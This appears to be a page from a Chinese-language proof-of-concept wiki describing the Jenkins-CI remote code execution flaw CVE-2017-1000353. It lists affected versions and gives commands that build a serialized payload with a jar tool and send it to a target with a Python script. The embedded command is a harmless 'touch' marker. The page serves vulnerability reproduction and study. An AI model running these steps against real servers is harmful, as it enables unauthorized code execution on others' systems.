menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Jenkins chevron_right Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

    影响范围

    Jenkins <=2.56
Jenkins LTS <= 2.46.1

    漏洞利用

    1、下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar,这是生成POC的工具

    执行下面命令,生成字节码文件

    java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令

    2、将刚才生成的字节码文件发送给目标

    python CVE-2017-1000353.py http://your-ip:8080 jenkins_poc.ser